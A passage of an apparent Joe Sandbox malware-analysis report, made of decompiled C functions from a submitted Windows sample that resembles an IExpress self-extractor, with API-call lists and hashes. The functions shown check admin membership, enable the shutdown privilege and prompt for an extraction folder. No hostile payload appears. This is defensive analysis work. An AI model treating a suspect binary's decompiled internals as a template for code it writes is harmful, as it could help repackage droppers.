                                                0x00386200
                                                0x00386200
                                                0x00000000

                                                APIs
                                                • CharNextA.USER32(?,00000000,?,?), ref: 00385CEE
                                                • GetModuleFileNameA.KERNEL32(00388B3E,00000104,00000000,?,?), ref: 00385DFC
                                                • CharUpperA.USER32(?), ref: 00385E3E
                                                • CharUpperA.USER32(-00000052), ref: 00385EE1
                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00385F6F
                                                • CharUpperA.USER32(?), ref: 00385FA7
                                                • CharUpperA.USER32(-0000004E), ref: 00386008
                                                • CharUpperA.USER32(?), ref: 003860AA
                                                • CloseHandle.KERNEL32(00000000,00381140,00000000,00000040,00000000), ref: 003861F1
                                                • ExitProcess.KERNEL32 ref: 003861F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                • String ID: "$"$:$RegServer
                                                • API String ID: 1203814774-25366791
                                                • Opcode ID: f1c8471403d8ac9f7f3a4d5bce7ce039fd6a6e24377544d3d8864dcc51419239
                                                • Instruction ID: eec8071ff4ff6981baa155919fda5349dc40132b107a206d7abdb08f24cbecbe
                                                • Opcode Fuzzy Hash: f1c8471403d8ac9f7f3a4d5bce7ce039fd6a6e24377544d3d8864dcc51419239
                                                • Instruction Fuzzy Hash: 43D17D71A08F449FDF37BB388C493FA7BA9AB55304F5500EAC486C6591D7748E868F41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E003818A3(void* __edx, void* __esi) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				char _v20;
                                                				long _v24;
                                                				void* _v28;
                                                				void* _v32;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t23;
                                                				long _t45;
                                                				void* _t49;
                                                				int _t50;
                                                				void* _t52;
                                                				signed int _t53;
                                                
                                                				_t51 = __esi;
                                                				_t49 = __edx;
                                                				_t23 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t23 ^ _t53;
                                                				_t25 =  *0x388128; // 0x2
                                                				_t45 = 0;
                                                				_v12 = 0x500;
                                                				_t50 = 2;
                                                				_v16.Value = 0;
                                                				_v20 = 0;
                                                				if(_t25 != _t50) {
                                                					L20:
                                                					return E00386CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                				}
                                                				if(E003817EE( &_v20) != 0) {
                                                					_t25 = _v20;
                                                					if(_v20 != 0) {
                                                						 *0x388128 = 1;
                                                					}
                                                					goto L20;
                                                				}
                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                					goto L20;
                                                				}
                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                					L17:
                                                					CloseHandle(_v28);
                                                					_t25 = _v20;
                                                					goto L20;
                                                				} else {
                                                					_push(__esi);
                                                					_t52 = LocalAlloc(0, _v24);
                                                					if(_t52 == 0) {
                                                						L16:
                                                						_pop(_t51);
                                                						goto L17;
                                                					}
                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                						L15:
                                                						LocalFree(_t52);
                                                						goto L16;
                                                					} else {
                                                						if( *_t52 <= 0) {
                                                							L14:
                                                							FreeSid(_v32);
                                                							goto L15;
                                                						}
                                                						_t15 = _t52 + 4; // 0x4
                                                						_t50 = _t15;
                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                							_t45 = _t45 + 1;
                                                							_t50 = _t50 + 8;
                                                							if(_t45 <  *_t52) {
                                                								continue;
                                                							}
                                                							goto L14;
                                                						}
                                                						 *0x388128 = 1;
                                                						_v20 = 1;
                                                						goto L14;
                                                					}
                                                				}
                                                			}


















                                                0x003818a3
                                                0x003818a3
                                                0x003818ab
                                                0x003818b2
                                                0x003818b5
                                                0x003818be
                                                0x003818c0
                                                0x003818c6
                                                0x003818c7
                                                0x003818ca
                                                0x003818cf
                                                0x003819c9
                                                0x003819d8
                                                0x003819d8
                                                0x003818df
                                                0x003819b8
                                                0x003819bd
                                                0x003819bf
                                                0x003819bf
                                                0x00000000
                                                0x003819bd
                                                0x003818fa
                                                0x00000000
                                                0x00000000
                                                0x00381912
                                                0x003819aa
                                                0x003819ad
                                                0x003819b3
                                                0x00000000
                                                0x00381927
                                                0x00381927
                                                0x00381932
                                                0x00381936
                                                0x003819a9
                                                0x003819a9
                                                0x00000000
                                                0x003819a9
                                                0x0038194c
                                                0x003819a2
                                                0x003819a3
                                                0x00000000
                                                0x0038196e
                                                0x00381970
                                                0x00381999
                                                0x0038199c
                                                0x00000000
                                                0x0038199c
                                                0x00381972
                                                0x00381972
                                                0x00381975
                                                0x00381984
                                                0x00381985
                                                0x0038198a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038198c
                                                0x00381991
                                                0x00381996
                                                0x00000000
                                                0x00381996
                                                0x0038194c

                                                APIs
                                                  • Part of subcall function 003817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003818DD), ref: 0038181A
                                                  • Part of subcall function 003817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0038182C
                                                  • Part of subcall function 003817EE: AllocateAndInitializeSid.ADVAPI32(003818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003818DD), ref: 00381855
                                                  • Part of subcall function 003817EE: FreeSid.ADVAPI32(?,?,?,?,003818DD), ref: 00381883
                                                  • Part of subcall function 003817EE: FreeLibrary.KERNEL32(00000000,?,?,?,003818DD), ref: 0038188A
                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003818EB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 003818F2
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0038190A
                                                • GetLastError.KERNEL32 ref: 00381918
                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0038192C
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00381944
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00381964
                                                • EqualSid.ADVAPI32(00000004,?), ref: 0038197A
                                                • FreeSid.ADVAPI32(?), ref: 0038199C
                                                • LocalFree.KERNEL32(00000000), ref: 003819A3
                                                • CloseHandle.KERNEL32(?), ref: 003819AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                • String ID:
                                                • API String ID: 2168512254-0
                                                • Opcode ID: 9cd19ceef79a2864ab2ba992eb591a835b6b6483a488b5435b0854d1f04784b7
                                                • Instruction ID: ed2dfa990ed05a68c2a42d74b5bd86e56082bb83e331f4306f3c07c0d6d226e6
                                                • Opcode Fuzzy Hash: 9cd19ceef79a2864ab2ba992eb591a835b6b6483a488b5435b0854d1f04784b7
                                                • Instruction Fuzzy Hash: 0E312FB1A00709EFEB22EFA5DC58AAFBBBCFF04750F2004A5E545D6150DB349906CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00381F90(signed int __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				int _v12;
                                                				struct _TOKEN_PRIVILEGES _v24;
                                                				void* _v28;
                                                				void* __ebx;
                                                				signed int _t13;
                                                				int _t21;
                                                				void* _t25;
                                                				int _t28;
                                                				signed char _t30;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t41;
                                                				signed int _t46;
                                                
                                                				_t41 = __esi;
                                                				_t38 = __edi;
                                                				_t30 = __ecx;
                                                				if((__ecx & 0x00000002) != 0) {
                                                					L12:
                                                					if((_t30 & 0x00000004) != 0) {
                                                						L14:
                                                						if( *0x389a40 != 0) {
                                                							_pop(_t30);
                                                							_t44 = _t46;
                                                							_t13 =  *0x388004; // 0xb25159a8
                                                							_v8 = _t13 ^ _t46;
                                                							_push(_t38);
                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                								_v24.PrivilegeCount = 1;
                                                								_v12 = 2;
                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                								CloseHandle(_v28);
                                                								_t41 = _t41;
                                                								_push(0);
                                                								if(_t21 != 0) {
                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                										_t25 = 1;
                                                									} else {
                                                										_t37 = 0x4f7;
                                                										goto L3;
                                                									}
                                                								} else {
                                                									_t37 = 0x4f6;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								_t37 = 0x4f5;
                                                								L3:
                                                								_push(0);
                                                								L4:
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								E003844B9(0, _t37);
                                                								_t25 = 0;
                                                							}
                                                							_pop(_t40);
                                                							return E00386CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                						} else {
                                                							_t28 = ExitWindowsEx(2, 0);
                                                							goto L16;
                                                						}
                                                					} else {
                                                						_t37 = 0x522;
                                                						_t28 = E003844B9(0, 0x522, 0x381140, 0, 0x40, 4);
                                                						if(_t28 != 6) {
                                                							goto L16;
                                                						} else {
                                                							goto L14;
                                                						}
                                                					}
                                                				} else {
                                                					__eax = E00381EA7(__ecx);
                                                					if(__eax != 2) {
                                                						L16:
                                                						return _t28;
                                                					} else {
                                                						goto L12;
                                                					}
                                                				}
                                                			}

















                                                0x00381f90
                                                0x00381f90
                                                0x00381f93
                                                0x00381f98
                                                0x00381fa4
                                                0x00381fa7
                                                0x00381fc5
                                                0x00381fcd
                                                0x00381fdb
                                                0x00381ee5
                                                0x00381eea
                                                0x00381ef1
                                                0x00381ef4
                                                0x00381f0c
                                                0x00381f2e
                                                0x00381f3a
                                                0x00381f46
                                                0x00381f4d
                                                0x00381f58
                                                0x00381f60
                                                0x00381f61
                                                0x00381f62
                                                0x00381f75
                                                0x00381f80
                                                0x00381f77
                                                0x00381f77
                                                0x00000000
                                                0x00381f77
                                                0x00381f64
                                                0x00381f64
                                                0x00000000
                                                0x00381f64
                                                0x00381f0e
                                                0x00381f0e
                                                0x00381f13
                                                0x00381f13
                                                0x00381f14
                                                0x00381f14
                                                0x00381f16
                                                0x00381f17
                                                0x00381f1a
                                                0x00381f1f
                                                0x00381f1f
                                                0x00381f86
                                                0x00381f8f
                                                0x00381fcf
                                                0x00381fd3
                                                0x00000000
                                                0x00381fd3
                                                0x00381fa9
                                                0x00381fb4
                                                0x00381fbb
                                                0x00381fc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00381fc3
                                                0x00381f9a
                                                0x00381f9a
                                                0x00381fa2
                                                0x00381fd9
                                                0x00381fda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00381fa2

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00381EFB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00381F02
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00381FD3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2795981589-3733053543
                                                • Opcode ID: 0d1e9b811a048f009c6e3fd03a7d28b82b4efd32cd4d2709414d290191be21c3
                                                • Instruction ID: 6911c522ce78e9c2611a32671d7390e00fe95785a19291c8d0339a94cf3aba4b
                                                • Opcode Fuzzy Hash: 0d1e9b811a048f009c6e3fd03a7d28b82b4efd32cd4d2709414d290191be21c3
                                                • Instruction Fuzzy Hash: 1B21B7B1A40305ABEB227BA19C4EFBF77BCEB85B10F210199FB06D6581D77488429761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00386CF0(char _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				_t1 =  &_a4; // 0x386e26
                                                				UnhandledExceptionFilter( *_t1);
                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                			}



                                                0x00386cf7
                                                0x00386cfd
                                                0x00386d00
                                                0x00386d19

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00386E26,00381000), ref: 00386CF7
                                                • UnhandledExceptionFilter.KERNEL32(&n8,?,00386E26,00381000), ref: 00386D00
                                                • GetCurrentProcess.KERNEL32(C0000409,?,00386E26,00381000), ref: 00386D0B
                                                • TerminateProcess.KERNEL32(00000000,?,00386E26,00381000), ref: 00386D12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                • String ID: &n8
                                                • API String ID: 3231755760-285023735
                                                • Opcode ID: 7f54443cd6878b48ee951c88c31d35fd809c6c4580c1409e4e7361de3308ca6f
                                                • Instruction ID: bf2def6ccfafa3e6cd43f21a727466722a237d106c5a742c8b892283a51a8520
                                                • Opcode Fuzzy Hash: 7f54443cd6878b48ee951c88c31d35fd809c6c4580c1409e4e7361de3308ca6f
                                                • Instruction Fuzzy Hash: 97D0C932004B08BBFB022BE1EC0CA593F2CEB48713F484082F31A82020CA3644518B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00387155() {
                                                				void* _v8;
                                                				struct _FILETIME _v16;
                                                				signed int _v20;
                                                				union _LARGE_INTEGER _v24;
                                                				signed int _t23;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				signed int _t39;
                                                
                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                				_t23 =  *0x388004; // 0xb25159a8
                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                					GetSystemTimeAsFileTime( &_v16);
                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                					QueryPerformanceCounter( &_v24);
                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                					_t39 = _t36;
                                                					if(_t36 == 0xbb40e64e || ( *0x388004 & 0xffff0000) == 0) {
                                                						_t36 = 0xbb40e64f;
                                                						_t39 = 0xbb40e64f;
                                                					}
                                                					 *0x388004 = _t39;
                                                				}
                                                				_t37 =  !_t36;
                                                				 *0x388008 = _t37;
                                                				return _t37;
                                                			}











                                                0x0038715d
                                                0x00387161
                                                0x00387165
                                                0x00387178
                                                0x00387182
                                                0x0038718e
                                                0x00387197
                                                0x003871a0
                                                0x003871b1
                                                0x003871b8
                                                0x003871c4
                                                0x003871c7
                                                0x003871cb
                                                0x003871d5
                                                0x003871da
                                                0x003871da
                                                0x003871dc
                                                0x003871dc
                                                0x003871e2
                                                0x003871e5
                                                0x003871ee

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00387182
                                                • GetCurrentProcessId.KERNEL32 ref: 00387191
                                                • GetCurrentThreadId.KERNEL32 ref: 0038719A
                                                • GetTickCount.KERNEL32 ref: 003871A3
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 003871B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: 666d54305898af6488ee0ed310aaa4276504b1a780d75c96591379a4d2848d90
                                                • Instruction ID: 5ea3b1dd98b3562ac82045757a93c922616acfbe67aca3bba8d106096856bbbe
                                                • Opcode Fuzzy Hash: 666d54305898af6488ee0ed310aaa4276504b1a780d75c96591379a4d2848d90
                                                • Instruction Fuzzy Hash: E9111C71D05708EFDB11DFB8DA4CA9EBBF9EF48315FA14896D805E7214EB349A048B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E00383210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* __edi;
                                                				void* _t6;
                                                				void* _t10;
                                                				int _t20;
                                                				int _t21;
                                                				int _t23;
                                                				char _t24;
                                                				long _t25;
                                                				int _t27;
                                                				int _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				int _t34;
                                                				int _t37;
                                                				int _t38;
                                                				int _t39;
                                                				void* _t42;
                                                				void* _t46;
                                                				CHAR* _t49;
                                                				void* _t58;
                                                				void* _t63;
                                                				struct HWND__* _t64;
                                                
                                                				_t64 = _a4;
                                                				_t6 = _a8 - 0x10;
                                                				if(_t6 == 0) {
                                                					_push(0);
                                                					L38:
                                                					EndDialog(_t64, ??);
                                                					L39:
                                                					__eflags = 1;
                                                					return 1;
                                                				}
                                                				_t42 = 1;
                                                				_t10 = _t6 - 0x100;
                                                				if(_t10 == 0) {
                                                					E003843D0(_t64, GetDesktopWindow());
                                                					SetWindowTextA(_t64, "lega");
                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                					__eflags =  *0x389a40 - _t42; // 0x3
                                                					if(__eflags == 0) {
                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                					}
                                                					L36:
                                                					return _t42;
                                                				}
                                                				if(_t10 == _t42) {
                                                					_t20 = _a12 - 1;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3891e4, 0x104);
                                                						__eflags = _t21;
                                                						if(_t21 == 0) {
                                                							L32:
                                                							_t58 = 0x4bf;
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0);
                                                							L25:
                                                							E003844B9(_t64, _t58);
                                                							goto L39;
                                                						}
                                                						_t49 = 0x3891e4;
                                                						do {
                                                							_t23 =  *_t49;
                                                							_t49 =  &(_t49[1]);
                                                							__eflags = _t23;
                                                						} while (_t23 != 0);
                                                						__eflags = _t49 - 0x3891e5 - 3;
                                                						if(_t49 - 0x3891e5 < 3) {
                                                							goto L32;
                                                						}
                                                						_t24 =  *0x3891e5; // 0x3a
                                                						__eflags = _t24 - 0x3a;
                                                						if(_t24 == 0x3a) {
                                                							L21:
                                                							_t25 = GetFileAttributesA(0x3891e4);
                                                							__eflags = _t25 - 0xffffffff;
                                                							if(_t25 != 0xffffffff) {
                                                								L26:
                                                								E0038658A(0x3891e4, 0x104, 0x381140);
                                                								_t27 = E003858C8(0x3891e4);
                                                								__eflags = _t27;
                                                								if(_t27 != 0) {
                                                									__eflags =  *0x3891e4 - 0x5c;
                                                									if( *0x3891e4 != 0x5c) {
                                                										L30:
                                                										_t30 = E0038597D(0x3891e4, 1, _t64, 1);
                                                										__eflags = _t30;
                                                										if(_t30 == 0) {
                                                											L35:
                                                											_t42 = 1;
                                                											__eflags = 1;
                                                											goto L36;
                                                										}
                                                										L31:
                                                										_t42 = 1;
                                                										EndDialog(_t64, 1);
                                                										goto L36;
                                                									}
                                                									__eflags =  *0x3891e5 - 0x5c;
                                                									if( *0x3891e5 == 0x5c) {
                                                										goto L31;
                                                									}
                                                									goto L30;
                                                								}
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								_t58 = 0x4be;
                                                								goto L25;
                                                							}
                                                							_t32 = E003844B9(_t64, 0x54a, 0x3891e4, 0, 0x20, 4);
                                                							__eflags = _t32 - 6;
                                                							if(_t32 != 6) {
                                                								goto L35;
                                                							}
                                                							_t33 = CreateDirectoryA(0x3891e4, 0);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								goto L26;
                                                							}
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0x3891e4);
                                                							_t58 = 0x4cb;
                                                							goto L25;
                                                						}
                                                						__eflags =  *0x3891e4 - 0x5c;
                                                						if( *0x3891e4 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						__eflags = _t24 - 0x5c;
                                                						if(_t24 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						goto L21;
                                                					}
                                                					_t34 = _t20 - 1;
                                                					__eflags = _t34;
                                                					if(_t34 == 0) {
                                                						EndDialog(_t64, 0);
                                                						 *0x389124 = 0x800704c7;
                                                						goto L39;
                                                					}
                                                					__eflags = _t34 != 0x834;
                                                					if(_t34 != 0x834) {
                                                						goto L36;
                                                					}
                                                					_t37 = LoadStringA( *0x389a3c, 0x3e8, 0x388598, 0x200);
                                                					__eflags = _t37;
                                                					if(_t37 != 0) {
                                                						_t38 = E00384224(_t64, _t46, _t46);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							goto L36;
                                                						}
                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3887a0);
                                                						__eflags = _t39;
                                                						if(_t39 != 0) {
                                                							goto L36;
                                                						}
                                                						_t63 = 0x4c0;
                                                						L9:
                                                						E003844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						goto L38;
                                                					}
                                                					_t63 = 0x4b1;
                                                					goto L9;
                                                				}
                                                				return 0;
                                                			}

























                                                0x0038321b
                                                0x0038321e
                                                0x00383221
                                                0x0038343c
                                                0x0038343e
                                                0x0038343f
                                                0x00383445
                                                0x00383447
                                                0x00000000
                                                0x00383447
                                                0x00383229
                                                0x0038322a
                                                0x0038322f
                                                0x003833ec
                                                0x003833f7
                                                0x00383410
                                                0x00383416
                                                0x0038341d
                                                0x0038342d
                                                0x0038342d
                                                0x00383438
                                                0x00000000
                                                0x00383438
                                                0x00383237
                                                0x00383243
                                                0x00383243
                                                0x00383246
                                                0x003832ee
                                                0x003832f4
                                                0x003832f6
                                                0x003833d4
                                                0x003833d6
                                                0x003833db
                                                0x003833dc
                                                0x003833de
                                                0x003833df
                                                0x00383370
                                                0x00383372
                                                0x00000000
                                                0x00383372
                                                0x003832fc
                                                0x00383301
                                                0x00383301
                                                0x00383303
                                                0x00383304
                                                0x00383304
                                                0x0038330a
                                                0x0038330d
                                                0x00000000
                                                0x00000000
                                                0x00383313
                                                0x00383318
                                                0x0038331a
                                                0x00383331
                                                0x00383332
                                                0x0038333a
                                                0x0038333d
                                                0x0038337c
                                                0x00383388
                                                0x0038338f
                                                0x00383394
                                                0x00383396
                                                0x003833a4
                                                0x003833ab
                                                0x003833b6
                                                0x003833be
                                                0x003833c3
                                                0x003833c5
                                                0x00383435
                                                0x00383437
                                                0x00383437
                                                0x00000000
                                                0x00383437
                                                0x003833c7
                                                0x003833c9
                                                0x003833cc
                                                0x00000000
                                                0x003833cc
                                                0x003833ad
                                                0x003833b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003833b4
                                                0x00383398
                                                0x00383399
                                                0x0038339b
                                                0x0038339c
                                                0x0038339d
                                                0x00000000
                                                0x0038339d
                                                0x0038334c
                                                0x00383351
                                                0x00383354
                                                0x00000000
                                                0x00000000
                                                0x0038335c
                                                0x00383362
                                                0x00383364
                                                0x00000000
                                                0x00000000
                                                0x00383366
                                                0x00383367
                                                0x00383369
                                                0x0038336a
                                                0x0038336b
                                                0x00000000
                                                0x0038336b
                                                0x0038331c
                                                0x00383323
                                                0x00000000
                                                0x00000000
                                                0x00383329
                                                0x0038332b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038332b
                                                0x0038324c
                                                0x0038324c
                                                0x0038324f
                                                0x003832c8
                                                0x003832ce
                                                0x00000000
                                                0x003832ce
                                                0x00383251
                                                0x00383256
                                                0x00000000
                                                0x00000000
                                                0x00383271
                                                0x00383277
                                                0x00383279
                                                0x00383298
                                                0x0038329d
                                                0x0038329f
                                                0x00000000
                                                0x00000000
                                                0x003832b0
                                                0x003832b6
                                                0x003832b8
                                                0x00000000
                                                0x00000000
                                                0x003832be
                                                0x00383280
                                                0x00383289
                                                0x0038328e
                                                0x00000000
                                                0x0038328e
                                                0x0038327b
                                                0x00000000
                                                0x0038327b
                                                0x00000000

                                                APIs
                                                • LoadStringA.USER32(000003E8,00388598,00000200), ref: 00383271
                                                • GetDesktopWindow.USER32 ref: 003833E2
                                                • SetWindowTextA.USER32(?,lega), ref: 003833F7
                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00383410
                                                • GetDlgItem.USER32(?,00000836), ref: 00383426
                                                • EnableWindow.USER32(00000000), ref: 0038342D
                                                • EndDialog.USER32(?,00000000), ref: 0038343F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lega
                                                • API String ID: 2418873061-2593092679
                                                • Opcode ID: dd129b9eb7d6c5b4ebd0b4706d832150806bb12a8c476ddd7508e4ad96814d67
                                                • Instruction ID: 702dc7079917931a76fb7d38754efaad58c41fb82cffb3ba01edce64d9d17b0d
                                                • Opcode Fuzzy Hash: dd129b9eb7d6c5b4ebd0b4706d832150806bb12a8c476ddd7508e4ad96814d67
                                                • Instruction Fuzzy Hash: D65125303413417BFB237B369C8CFBB2A5DDB86F54F5444E9F645976C0CAA88A029362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00382CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
